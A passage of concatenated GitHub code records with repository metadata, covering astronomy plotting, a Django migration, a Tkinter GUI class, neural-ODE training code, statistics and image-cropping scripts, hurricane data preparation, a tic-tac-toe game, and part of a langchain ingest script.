matplotlib_interfacer.plot_scatter_on_ax(plot_type, xs, ys, xlabel, ylabel, labels, title, **kwargs)\n if empty:\n to_return = None,None\n self.quasar_array_handler.update_qlist(qtype,unfiltered_qlist)\n return to_return\n\n def plot_hist(self,yVar,xVar='rdivR',qtype = 'sim',**kwargs):\n if qtype != 'sim':\n raise BadPlotError('can only plot simulation sightlines for plot_hist')\n plot_type,xVar_packet,yVar_packet,labels,filter_for = var_labels_interpreter.configure_variables(xVar,yVar,'scatter',**kwargs)\n assert plot_type in [1,2], \"'plot_hist' can only plot one continuous variable against one discrete variable\"\n unfiltered_qlist = self.quasar_array_handler.impose_requirements(filter_for,qtype)\n xlabel,ylabel,title = var_labels_interpreter.get_labels_and_titles(plot_type,xVar_packet,yVar_packet,'hist',**kwargs)\n quasar_array = var_labels_interpreter.decide_quasar_array('sim',self.quasar_array_handler.get_qlist('sim'),**kwargs)\n xarys,yarys = plot_data_processor.get_xy_vals(plot_type,xVar_packet,yVar_packet,quasar_array,**kwargs)\n xs,ys,weight,cbarlabel,empty = errorbar_processor.process_xy_vals_hist(xVar_packet,yVar_packet,xarys,yarys,**kwargs)\n if not empty:\n to_return = matplotlib_interfacer.plot_hist_on_ax(plot_type, xs, ys, xlabel, ylabel, title, weight, cbarlabel, **kwargs)\n else:\n to_return = None,None\n self.quasar_array_handler.update_qlist(qtype,unfiltered_qlist)\n return to_return\n\n def faberplot(self,yVar,xVar='rdivR',plot_kind='err',lq2=None,qtype='sim',lq=None,fig = None, axes = None,figsize='guess',sharex=True,sharey=True,\\\n **kwargs):\n #after using sort_by_2d to get a set of labels and a 2d array of quasarspheres,\n #ask plot_err or plot_hist for completed plots of type given, for \n #quasars in that cell of quasarArray, put them in subplots of a n by m subplots object\n #and show that plot\n if lq2 is None:\n raise BadPlotError('required to use sort_by_2D before plotting a faberplot')\n fig,axes = 
matplotlib_interfacer.setup_faberplot_subplots(lq2,fig,axes,figsize,sharex,sharey)\n old_quasar_array = self.quasar_array_handler.get_qlist(qtype)\n quasar_array = lq2[4][self.quasar_array_handler.get_qtype_index(qtype)]\n for i,axlist in enumerate(axes):\n for j,ax in enumerate(axlist):\n self.quasar_array_handler.update_qlist(qtype,quasar_array[i][j])\n if lq is not None:\n lq = self.sort_by(lq[3],lq[1],**kwargs)\n lq = [None]*len(lq[0]) if i>0 or j>0 else lq[0],lq[1],lq[2],lq[3]\n if plot_kind=='err':\n self.plot_err(yVar, xVar=xVar, qtype=qtype, fig = fig,ax = ax, lq=lq, **kwargs)\n elif plot_kind=='scatter':\n self.plot_scatter(yVar, xVar=xVar, qtype=qtype, fig = fig,ax = ax, lq=lq, **kwargs)\n elif plot_kind=='hist':\n self.plot_hist(yVar, xVar=xVar, qtype=qtype, fig = fig,ax = ax, **kwargs)\n matplotlib_interfacer.handle_faberplot_titles(i,j,axes,lq2)\n self.quasar_array_handler.update_qlist(qtype,old_quasar_array)\n return fig,axes\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"claytonstrawn/quasarscan","sub_path":"quasarscan/plotting/multi_quasar_sphere_plotter.py","file_name":"multi_quasar_sphere_plotter.py","file_ext":"py","file_size_in_byte":12675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"12504894743","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Item',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('active', models.BooleanField(default=True)),\n ('purchased', models.BooleanField(default=True)),\n ('amount', models.PositiveIntegerField(default=0)),\n ('created_at', models.DateTimeField(default=datetime.datetime.now, editable=False)),\n ('modified_at', models.DateTimeField(default=datetime.datetime.now, editable=False, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('active', models.BooleanField(default=True)),\n ('quantity', models.PositiveIntegerField(default=0, blank=True)),\n ('measure', models.CharField(blank=True, max_length=3, choices=[(b'kg', b'Kilogramos'), (b'l', b'Litros')])),\n ('created_at', models.DateTimeField(default=datetime.datetime.now, editable=False)),\n ('modified_at', models.DateTimeField(default=datetime.datetime.now, editable=False, blank=True)),\n ],\n ),\n migrations.AddField(\n model_name='item',\n name='product',\n field=models.ForeignKey(to='product.Product'),\n ),\n ]\n","repo_name":"rbenvos/BuyIt","sub_path":"BuyIt_Backend/apps/product/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3672317400","text":"###\r\n#\r\n#\r\n#\r\n# Program Description : Base class for all Notebooks in the GUI\r\n# Created By : Benjamin Kleynhans\r\n# Creation Date : May 28, 2019\r\n# Authors : Benjamin Kleynhans\r\n#\r\n# Last Modified By : Benjamin Kleynhans\r\n# Last Modified Date : August 29, 2019\r\n# Filename : gui_notebook.py\r\n#\r\n###\r\n\r\n# Imports\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport pdb\r\n\r\nclass Gui_Notebook():\r\n\r\n # Main Gui Frame constructor\r\n def 
__init__(self, root, master, notebook_name):\r\n\r\n        self.root = root\r\n\r\n        self.notebook_name = notebook_name\r\n\r\n        self.create_gui_notebook(master)\r\n\r\n\r\n    # Create the actual Frame\r\n    def create_gui_notebook(self, master):\r\n\r\n        self.gui_notebook = ttk.Notebook(master)\r\n\r\n        # Create notebook container to easily access notebooks from other areas in the gui\r\n        self.notebooks = {}\r\n        self.gui_notebook.notebooks = self.notebooks\r\n\r\n        # Create frame container to easily access frames from other areas in the gui\r\n        self.frames = {}\r\n        self.gui_notebook.frames = self.frames\r\n\r\n        # Create widgets container to easily access widgets from other areas in the gui\r\n        self.widgets = {}\r\n        self.gui_notebook.widgets = self.widgets\r\n\r\n        # Create canvas container to easily access canvases from other areas in the gui\r\n        self.canvases = {}\r\n        self.gui_notebook.canvases = self.canvases\r\n\r\n        # Create toolbar container to easily access toolbars from other areas in the gui\r\n        self.toolbars = {}\r\n        self.gui_notebook.toolbars = self.toolbars\r\n\r\n        # Create window container to easily access windows from other areas in the gui\r\n        self.windows = {}\r\n        self.gui_notebook.windows = self.windows\r\n\r\n        self.root.classes[self.notebook_name] = self\r\n        self.root.notebooks[self.notebook_name] = self.gui_notebook\r\n        master.notebooks[self.notebook_name] = self.gui_notebook","repo_name":"bkleynhans/PyMono","sub_path":"gui/forms/base_classes/gui_notebook.py","file_name":"gui_notebook.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29244891099","text":"import torch\nimport torch.nn as nn\nimport torch.utils.data as data\nimport pytorch_lightning as pl\n\nclass ClassificationLearner(pl.LightningModule):\n    def __init__(self, \n                X_data: torch.Tensor, \n                y_data: torch.Tensor,\n                t_span:torch.Tensor, \n                model:nn.Module):\n\n        super().__init__()\n        self.model, self.t_span = model, t_span\n        self.X_data = X_data\n        self.y_data = y_data\n    \n    def forward(self, x):\n        return self.model(x)\n    \n    def training_step(self, batch, batch_idx):\n        x, y = batch \n        t_eval, y_hat = self.model(x, self.t_span)\n        y_hat = y_hat[-1] # select last point of solution trajectory\n        loss = nn.CrossEntropyLoss()(y_hat, y)\n        return {'loss': loss} \n    \n    def configure_optimizers(self):\n        return torch.optim.Adam(self.model.parameters(), lr=0.01)\n\n    def train_dataloader(self):\n\n        X = self.X_data\n        yn = self.y_data\n\n        X_train = torch.Tensor(X)\n        y_train = torch.LongTensor(yn.long())\n        \n        train = data.TensorDataset(X_train, y_train)\n        trainloader = data.DataLoader(train, batch_size=len(X), shuffle=True)\n\n        return trainloader\n\n\nclass TrajectoryLearner(pl.LightningModule):\n    def __init__(self, \n                datamodule: pl.LightningDataModule,\n                model:pl.LightningModule):\n\n        super().__init__()\n\n        self.model = model\n        self.datamodule = datamodule\n\n        self.save_hyperparameters(ignore=['model'])\n    \n    def forward(self, x, t):\n\n        batch_size, _, _ = x.size()\n        x_hat = torch.zeros_like(x)\n        t_spans = torch.zeros(batch_size, 2)\n\n        for bat in range(batch_size):\n            batch_times = t[bat].squeeze()\n            t_spans[bat,0] = batch_times[0]\n            t_spans[bat,1] = batch_times[-1]\n\n            #Assuming the NeuralODE class is using model(x,t) and not model.trajectory(x,t):\n            _, x_out = self.model(x[bat].squeeze(), t_spans[bat])\n\n            x_hat[bat] = x_out[-1]\n\n        return x_hat, t_spans\n    \n    def training_step(self, batch, batch_idx):\n        x, t = 
batch\n\n        #NeuralODE model handles single sample operations,\n        #so batch the data in here:\n\n        x_hat, _ = self.forward(x,t)\n\n        #loss: difference between true trajectory\n        #and the evolved Neural ODE trajectory\n        mse = nn.MSELoss()\n        loss = mse(x_hat, x)\n\n        self.log_dict(\n            {\n                \"train_loss\": loss,\n            }\n        )\n\n        return loss \n\n    def validation_step(self, batch, batch_idx):\n\n        x, t = batch \n        \n        #NeuralODE model handles single sample operations,\n        #so batch the data in here:\n\n        x_hat, _ = self.forward(x,t)\n\n        #import pdb; pdb.set_trace();\n\n        #loss: difference between true trajectory\n        #and the evolved Neural ODE trajectory\n        mse = nn.MSELoss()\n        loss = mse(x_hat, x)\n\n        self.log_dict(\n            {\n                \"val_loss\": loss,\n            }\n        )\n\n        return loss\n    \n    def configure_optimizers(self):\n        optimizer = torch.optim.Adam(self.model.parameters(), lr=0.01)\n\n        return optimizer\n\n    def train_dataloader(self):\n        return self.datamodule.train_dataloader()\n\n    def val_dataloader(self):\n        return self.datamodule.val_dataloader()\n\n    def test_dataloader(self):\n        return self.datamodule.test_dataloader()","repo_name":"j0n18/NeuroEvolutionaryODEs","sub_path":"NEODEs/learners.py","file_name":"learners.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20374105070","text":"# Ashur Motlagh\n# 018319910\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport random\n\ndef SSonConIntervals(N, mu, sig, n):\n    NGD = np.random.normal(mu, sig, N)  # Normal Gaussian\n\n    mean = []  # initializing list\n    topof95 = []\n    bottomof95 = []\n    topof99 = []\n    bottomof99 = []\n\n    for i in range(0, n):\n        count = i + 1\n        x = NGD[random.sample(range(N), count)]\n        mean.append(np.sum(x) / count)\n        std = sig / math.sqrt(count)\n        topof95.append(mu + 1.96 * std)  # append the values\n        bottomof95.append(mu - 1.96 * std)\n        topof99.append(mu + 2.58 * std)\n        bottomof99.append(mu - 2.58 * std)\n\n    list = [x for x in range(1, count + 1)]  # making new list with range from 1 to count + 1\n\n    fig1 = plt.figure(1)\n    plt.scatter(list, mean, c='Blue', marker='x')\n    plt.plot(list, topof95, 'r--')\n    plt.plot(list, bottomof95, 'r--')\n    plt.title('Sample Means and 95% confidence Intervals')\n    plt.xlabel('Sample Size')\n    plt.ylabel('x_bar')\n\n    fig2 = plt.figure(2)\n    plt.scatter(list, mean, c='Blue', marker='x')\n    plt.plot(list, topof99, 'g--')\n    plt.plot(list, bottomof99, 'g--')\n    plt.title('Sample Means and 99% confidence Intervals')\n    plt.xlabel('Sample Size')\n    plt.ylabel('x_bar')\n\n    plt.show()\n\n\nN = 1500000\nmu = 55\nsig = 5\nn = 200\nSSonConIntervals(N, mu, sig, n)\n","repo_name":"AshurMotlagh/EE-381","sub_path":"Lab 5/L5Num1.py","file_name":"L5Num1.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14025008360","text":"# USAGE\n# python /home/nmorales/cxgn/DroneImageScripts/ImageCropping/CropToChunks.py --inputfile_path /export/archive/mystitchedimage.png --output_path /export/mychoppedimages/ --width 2000 --height 1000\n\n# import the necessary packages\nimport argparse\nimport imutils\nimport cv2\nimport numpy as np\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--inputfile_path\", required=True, help=\"complete file path to the image you want to cut into chunks\")\nap.add_argument(\"-o\", \"--output_path\", required=True, help=\"file path directory where the cut 
images will be saved\")\nap.add_argument(\"-x\", \"--width\", required=True, help=\"the width of the output image chunks in px\")\nap.add_argument(\"-y\", \"--height\", required=True, help=\"the height of the output image chunks in px\")\nargs = vars(ap.parse_args())\n\ninputfile_path = args[\"inputfile_path\"]\noutput_path = args[\"output_path\"]\nwidth = int(args[\"width\"])\nheight = int(args[\"height\"])\n\ninput_image = cv2.imread(inputfile_path, cv2.IMREAD_COLOR)\ninput_image_size = input_image.shape\nprint(input_image_size)\ninput_image_height = input_image_size[0]\ninput_image_width = input_image_size[1]\n\ncurrent_width = 0\ncurrent_height = 0\nwidth_overlap = 500\nheight_overlap = 500\n\ncrops = []\nfor col in range(0, input_image_width, width-width_overlap):\n for row in range(0, input_image_height, height-height_overlap):\n cropped = input_image[col:col+width, row:row+height]\n if (cropped.shape[0] != 0 and cropped.shape[1] != 0):\n crops.append(cropped)\n\ncount = 1\nfor i in crops:\n # cv2.imshow(\"Result\", i)\n # cv2.waitKey(0)\n cv2.imwrite(output_path+'image'+str(count)+'.png', i)\n count += 1\n","repo_name":"solgenomics/DroneImageScripts","sub_path":"ImageCropping/CropToChunks.py","file_name":"CropToChunks.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"20375517250","text":"\"\"\"Build the split and scaled training and validation hurricane data arrays.\r\n\r\nFunctions\r\n---------\r\nbuild_hurricane_data(data_path, settings, verbose=0)\r\n\r\n\"\"\"\r\nimport pprint\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\n\r\nimport toolbox\r\n\r\n\r\n__author__ = \"Elizabeth A. Barnes and Randal J Barnes\"\r\n__version__ = \"18 March 2022\"\r\n\r\n\r\ndef build_hurricane_data(data_path, settings, verbose=0):\r\n \"\"\"Build the training and validation tensors.\r\n\r\n The settings['target'] specifies which data set to build.There are five\r\n different possible targets: intensity, logitude, latitude, radial, and\r\n angle.\r\n\r\n Arguments\r\n ---------\r\n data_path : str\r\n The input filepath, not including the file name.\r\n\r\n settings : dict\r\n The parameters defining the current experiment.\r\n\r\n verbose : int\r\n 0 -> silent\r\n 1 -> description only\r\n 2 -> description and y statistics\r\n\r\n Returns\r\n -------\r\n x_train : numpy.ndarray\r\n The training split of the x data.\r\n shape = [n_train, n_features].\r\n\r\n onehot_train : numpy.ndarray\r\n The training split of the scaled y data is in the first column.\r\n The remaining columns are filled with zeros. The number of columns\r\n equal the number of distribution parameters.\r\n shape = [n_train, n_parameters].\r\n\r\n x_val : numpy.ndarray\r\n The validation split of the x data.\r\n shape = [n_val, n_features].\r\n\r\n onehot_val : numpy.ndarray\r\n The validation split of the scaled y data is in the first column.\r\n The remaining columns are filled with zeros. The number of columns\r\n equal the number of distribution parameters.\r\n shape = [n_val, n_parameters].\r\n\r\n data_summary : dict\r\n A descriptive dictionary of the data.\r\n\r\n df_val : pandas dataframe\r\n A pandas dataframe containing validation records. 
The dataframe\r\n contains all columns from the original file.\r\n However, the dataframe contains only rows from the validation data\r\n set that satisfy the specified basin and leadtime requirements, and\r\n were not eliminated due to missing values.\r\n\r\n The dataframe has the shuffled order of the rows. In particular,\r\n the rows of df_val align with the rows of x_val and onehot_val.\r\n\r\n Notes\r\n -----\r\n * No scaling or normalization is applied during data preparation.\r\n\r\n \"\"\"\r\n # Setup for the selected target.\r\n if settings[\"target\"] == \"intensity\":\r\n x_names = [\r\n \"NCI\",\"VMAX0\",\r\n \"DSDV\", \"LGDV\", \"HWDV\", \"AVDV\",\r\n \"VMXC\", \"DV12\", \"SLAT\", \"SSTN\", \"SHDC\", \"DTL\",\r\n ]\r\n y_name = [\"OBDV\"]\r\n missing = None\r\n\r\n elif settings[\"target\"] == \"longitude\":\r\n # x_names = [\"AVDX\", \"EMDX\", \"EGDX\", \"HWDX\", \"LONC\"]\r\n x_names = [\r\n \"NCT\",\r\n \"AVDX\", \"EMDX\", \"EGDX\", \"HWDX\",\r\n \"LONC\", \"LATC\",\r\n \"VMXC\", \"DV12\", \"SHDC\", \"SSTN\", \"DTL\",\r\n ]\r\n y_name = [\"OBDX\"]\r\n missing = -9999\r\n\r\n elif settings[\"target\"] == \"latitude\":\r\n # x_names = [\"AVDY\", \"EMDY\", \"EGDY\", \"HWDY\", \"LATC\"]\r\n x_names = [\r\n \"NCT\", \"AVDY\", \"EMDY\", \"EGDY\", \"HWDY\",\r\n \"LONC\", \"LATC\",\r\n \"VMXC\", \"DV12\", \"SHDC\", \"SSTN\", \"DTL\",\r\n ]\r\n y_name = [\"OBDY\"]\r\n missing = -9999\r\n\r\n elif settings[\"target\"] == \"radial\":\r\n x_names = [\r\n \"NCT\",\r\n \"AVDX\", \"EMDX\", \"EGDX\", \"HWDX\",\r\n \"AVDY\", \"EMDY\", \"EGDY\", \"HWDY\",\r\n \"LONC\", \"LATC\",\r\n \"VMXC\", \"DV12\", \"SHDC\", \"SSTN\", \"DTL\",\r\n \"DSDV\", \"LGDV\", \"HWDV\", \"AVDV\",\r\n ]\r\n y_name = [\"OBDR\"]\r\n missing = -9999\r\n\r\n else:\r\n raise NotImplementedError\r\n\r\n # Get the data from the specified file and filter out the unwanted rows.\r\n datafile_path = data_path + settings[\"filename\"]\r\n df_raw = pd.read_table(datafile_path, sep=\"\\s+\")\r\n df_raw = df_raw.rename(columns={'Date': 'year'}) \r\n\r\n df = df_raw[\r\n (df_raw[\"ATCF\"].str.contains(settings[\"basin\"])) &\r\n (df_raw[\"ftime(hr)\"] == settings[\"leadtime\"])\r\n ]\r\n\r\n if missing is not None:\r\n df = df.drop(df.index[df[y_name[0]] == missing])\r\n\r\n # Shuffle the rows in the df Dataframe, using the numpy rng.\r\n # rng = np.random.default_rng(settings['rng_seed'])\r\n df = df.sample(frac=1,random_state=settings['rng_seed'])\r\n df = df.reset_index(drop=True)\r\n\r\n #======================================================================\r\n # Train/Validation/Test Split\r\n \r\n # Get the testing data\r\n if settings[\"test_condition\"] is None:\r\n pass\r\n elif settings[\"test_condition\"] == \"cluster\":\r\n \r\n from scipy.cluster.vq import kmeans,vq\r\n numclust = 6\r\n \r\n data = np.copy(df[x_names].to_numpy())\r\n data_mean = np.mean(data,axis=0)\r\n data_std = np.std(data,axis=0)\r\n data = (data - data_mean)/data_std\r\n\r\n clusters, dist = kmeans(data, numclust, iter=500, seed=settings[\"rng_seed\"])\r\n cluster_label, _ = vq(data,clusters)\r\n class_freq = np.bincount(cluster_label)\r\n cluster_out = np.argmin(class_freq)\r\n\r\n index = np.where(cluster_label == cluster_out)[0]\r\n df_test = df.iloc[index]\r\n x_test = df_test[x_names].to_numpy()\r\n y_test = np.squeeze(df_test[y_name].to_numpy())\r\n df_test = df_test.reset_index(drop=True)\r\n \r\n df = df.drop(index)\r\n df = df.reset_index(drop=True)\r\n \r\n if verbose != 0:\r\n fig, axs = plt.subplots(1,2, figsize=(15,5))\r\n 
plt.sca(axs[0])\r\n plt.hist(cluster_label,np.arange(-.5,numclust+.5,1.), width=.98)\r\n plt.title('Sample Count by Cluster')\r\n plt.ylabel('number of samples')\r\n plt.xlabel('cluster')\r\n plt.xticks((0,1,2,3))\r\n plt.sca(axs[1])\r\n for ic in np.arange(0,numclust):\r\n plt.plot(x_names,clusters[ic,:], label='cluster ' + str(ic),linewidth=2)\r\n plt.legend()\r\n plt.title('Cluster Centroid')\r\n plt.ylabel('standardized units')\r\n plt.xlabel('predictor')\r\n plt.show() \r\n else:\r\n years = settings[\"years_test\"]\r\n if verbose != 0:\r\n print('years' + str(years) + ' withheld for testing')\r\n index = df.index[df['year'].isin(years)] \r\n df_test = df.iloc[index]\r\n x_test = df_test[x_names].to_numpy()\r\n y_test = np.squeeze(df_test[y_name].to_numpy())\r\n df_test = df_test.reset_index(drop=True)\r\n \r\n df = df.drop(index)\r\n df = df.reset_index(drop=True)\r\n \r\n # get the validation data\r\n if settings[\"val_condition\"] == \"random\":\r\n index = np.arange(0,settings[\"n_val\"])\r\n if(len(index)<100):\r\n raise Warning(\"Are you sure you want n_val < 100?\")\r\n \r\n elif settings[\"val_condition\"] == \"years\":\r\n if verbose != 0:\r\n print('years' + str(settings[\"n_val\"]) + ' withheld for testing')\r\n index = df.index[df['year'].isin(settings[\"n_val\"])] \r\n \r\n # unique_years = df['year'].unique()\r\n # years = unique_years[:settings[\"n_val\"]]\r\n # index = df.index[df['year'].isin(years)] \r\n \r\n df_val = df.iloc[index]\r\n x_val = df_val[x_names].to_numpy()\r\n y_val = np.squeeze(df_val[y_name].to_numpy())\r\n df_val = df_val.reset_index(drop=True)\r\n \r\n df = df.drop(index)\r\n df = df.reset_index(drop=True)\r\n \r\n if settings[\"test_condition\"] is None:\r\n df_test = df_val.copy()\r\n x_test = copy.deepcopy(x_val)\r\n y_test = copy.deepcopy(y_val)\r\n \r\n # Subsample training if desired\r\n if settings[\"n_train\"] == \"max\":\r\n df_train = df.copy()\r\n else:\r\n df_train = df.iloc[:settings[\"n_train\"]]\r\n x_train = df_train[x_names].to_numpy()\r\n y_train = np.squeeze(df_train[y_name].to_numpy())\r\n df_train = df_train.reset_index(drop=True)\r\n \r\n #====================================================================== \r\n # Create 'onehot' y arrays. The y values go in the first column, and the\r\n # remaining columns are zero -- i.e. dummy columns. 
These dummy columns\r\n    # are required by tensorflow; the number of columns must equal the number\r\n    # of distribution parameters.\r\n    if settings[\"uncertainty_type\"] in (\"bnn\",\"mcdrop\",\"reg\"):\r\n        n_parameters = 1\r\n    elif \"bnnshash\" in settings[\"uncertainty_type\"]:\r\n        n_parameters = 1 \r\n    elif \"shash2\" in settings[\"uncertainty_type\"]:\r\n        n_parameters = 2\r\n    elif \"shash3\" in settings[\"uncertainty_type\"]:\r\n        n_parameters = 3\r\n    elif \"shash4\" in settings[\"uncertainty_type\"]:\r\n        n_parameters = 4\r\n    else:\r\n        raise NotImplementedError\r\n    \r\n    \r\n    onehot_train = np.zeros((len(y_train), n_parameters))\r\n    onehot_val = np.zeros((len(y_val), n_parameters))\r\n    onehot_test = np.zeros((len(y_test), n_parameters))    \r\n\r\n    onehot_train[:, 0] = y_train\r\n    onehot_val[:, 0] = y_val\r\n    onehot_test[:, 0] = y_test\r\n\r\n    # Make a descriptive dictionary.\r\n    data_summary = {\r\n        \"datafile_path\": datafile_path,\r\n        \"x_train_shape\": tuple(x_train.shape),\r\n        \"x_val_shape\": tuple(x_val.shape),\r\n        \"x_test_shape\": tuple(x_test.shape),        \r\n        \"onehot_train_shape\": tuple(onehot_train.shape),\r\n        \"onehot_val_shape\": tuple(onehot_val.shape),\r\n        \"onehot_test_shape\": tuple(onehot_test.shape),        \r\n        \"x_names\": x_names,\r\n        \"y_name\": y_name,\r\n    }\r\n\r\n    # Report the results.\r\n    if verbose >= 1:\r\n        pprint.pprint(data_summary, width=80)\r\n\r\n    if verbose >= 2:\r\n        toolbox.print_summary_statistics({\"y_train\" : onehot_train[:,0], \r\n                                          \"y_val\" : onehot_val[:,0], \r\n                                          \"y_test\" : onehot_test[:,0]}, \r\n                                         sigfigs=1)\r\n        \r\n    # change dtype of onehot\r\n    onehot_train = onehot_train.astype('float32')\r\n    onehot_val = onehot_val.astype('float32')    \r\n    onehot_test = onehot_test.astype('float32')\r\n    \r\n    # create valtest set\r\n    x_valtest = np.concatenate((x_val, x_test), axis=0)\r\n    onehot_valtest = np.concatenate((onehot_val, onehot_test), axis=0)\r\n    df_valtest = df_val.append(df_test)\r\n\r\n    return (\r\n        data_summary, \r\n        x_train,\r\n        onehot_train,\r\n        x_val,\r\n        onehot_val,\r\n        x_test,\r\n        onehot_test, \r\n        x_valtest,\r\n        onehot_valtest,\r\n        df_train,\r\n        df_val,\r\n        df_test,\r\n        df_valtest,\r\n    )\r\n","repo_name":"eabarnes1010/hurricane_uqcomparisons","sub_path":"build_data.py","file_name":"build_data.py","file_ext":"py","file_size_in_byte":10820,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"31885126027","text":"variant_winner = [\n    ['00', '10', '20'],  # first vertical\n    ['01', '11', '21'],  # second vertical\n    ['02', '12', '22'],  # third vertical\n\n    ['00', '01', '02'],  # first horizontal\n    ['10', '11', '12'],  # second horizontal\n    ['20', '21', '22'],  # third horizontal\n\n    ['00', '11', '22'],  # left top diagonal\n    ['02', '11', '20'],  # right top diagonal\n]\n\nuser_choose = {\n    'x': [],\n    '0': []\n}\n\n\ntable = [\n    # 0    1    2\n    ['-', '-', '-'],  # 0\n    ['-', '-', '-'],  # 1\n    ['-', '-', '-'],  # 2\n]\n\n\ndef print_table(table):\n    print(*[' ', 0, 1, 2])\n    for index, row in enumerate(table):\n        print(index, *row)\n\n\ndef check_winner(user_choose, variant_winner):\n    for winner in variant_winner:\n        # all three cells of a winning line must be among this player's moves\n        if all(cell in user_choose for cell in winner):\n            return True\n    return False\n\n\ndef check_user_input(user_input):\n    if len(user_input) != 2:\n        print('You can input only two numbers')\n        return False\n    if user_input in user_choose['x'] or user_input in user_choose['0']:\n        print('This cell is already taken')\n        return False\n    if not user_input.isdigit():\n        print('You can input only numbers')\n        return False\n    
return True\n\n\nprint_table(table)\n\nplayer = 'x'\ncount_step = 1\nwhile count_step <= 9:\n user = input(f'Enter {player}: ')\n check_input = check_user_input(user)\n if not check_input:\n print('Your coordinates are wrong. Try again...')\n continue\n user_choose[player].append(user)\n\n first = int(user[0])\n second = int(user[1])\n\n table[first][second] = player\n print_table(table)\n\n check = check_winner(user_choose[player], variant_winner)\n if check:\n print('The winner player ', player)\n break\n\n player = '0' if player == 'x' else 'x'\n count_step += 1\n\n\n\n\n\n\n\n","repo_name":"kaitmen/FirstProject","sub_path":"game_X_0.py","file_name":"game_X_0.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25703210269","text":"#!/usr/bin/env python3\nimport os\nimport glob\nfrom typing import List\nfrom multiprocessing import Pool\nfrom tqdm import tqdm\nimport re\n\nfrom langchain.document_loaders import (\n CSVLoader,\n EverNoteLoader,\n PDFMinerLoader,\n TextLoader,\n UnstructuredEmailLoader,\n UnstructuredEPubLoader,\n UnstructuredHTMLLoader,\n UnstructuredMarkdownLoader,\n UnstructuredODTLoader,\n UnstructuredPowerPointLoader,\n UnstructuredWordDocumentLoader\n)\nfrom helper.pdfHelper import customPdfLoader\n\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\n#from langchain.vectorstores import Chroma\n#from langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.docstore.document import Document\nfrom chromadb.api import Collection\n\nfrom constants import (\n #CHROMA_SETTINGS, \n AI_DB_PERSIST_DIR, \n SOURCE_DOCUMENT_PATH, \n #EMBEDDING_INSTANCE,\n AI_DB_STORE_DOCUMENT_SIZE_PER_CHUNK,\n AI_DB_METADATA_INTERNAL_IDX_NAME,\n AI_DB_METADATA_DOCUMENT_SOURCE_NAME,\n get_default_ai_db_collection_name,\n load_chroma_database,\n get_default_embedding,\n transform_special_character_to_encoded\n)\n\n\n# Load environment variables\npersist_directory = AI_DB_PERSIST_DIR\nsource_directory = SOURCE_DOCUMENT_PATH\n#embeddings_model_name = EMBEDDING_MODEL_NAME\nchunk_size = AI_DB_STORE_DOCUMENT_SIZE_PER_CHUNK\nchunk_overlap = 50\n\n\n# Custom document loaders\nclass MyElmLoader(UnstructuredEmailLoader):\n \"\"\"Wrapper to fallback to text/plain when default does not work\"\"\"\n\n def load(self) -> List[Document]:\n \"\"\"Wrapper adding fallback for elm without html\"\"\"\n try:\n try:\n doc = UnstructuredEmailLoader.load(self)\n except ValueError as e:\n if 'text/html content not found in email' in str(e):\n # Try plain text\n self.unstructured_kwargs[\"content_source\"]=\"text/plain\"\n doc = UnstructuredEmailLoader.load(self)\n else:\n raise\n except Exception as e:\n # Add file_path to exception message\n raise type(e)(f\"{self.file_path}: {e}\") from e\n\n return doc\n\n\n# Map file extensions to document loaders and their arguments\nLOADER_MAPPING = {\n \".csv\": (CSVLoader, {}),\n # \".docx\": (Docx2txtLoader, {}),\n \".doc\": (UnstructuredWordDocumentLoader, {}),\n \".docx\": (UnstructuredWordDocumentLoader, {}),\n \".enex\": (EverNoteLoader, {}),\n \".eml\": (MyElmLoader, {}),\n \".epub\": (UnstructuredEPubLoader, {}),\n \".html\": (UnstructuredHTMLLoader, {}),\n \".md\": (UnstructuredMarkdownLoader, {}),\n \".odt\": (UnstructuredODTLoader, {}),\n\n # PDFMinerLoader reads tabular PDF content incorrectly: it reads vertically, column by column, when it should read row by row.\n # As a result, the text stored in the ai db comes back as a garbled block when queried.\n # Hence customPdfLoader was adopted instead, built on the PyPDF2 package\n
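 # (Each entry maps a file extension to a (LoaderClass, loader_kwargs) pair; load_single_document below unpacks it and calls LoaderClass(file_path, **loader_kwargs).)\n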
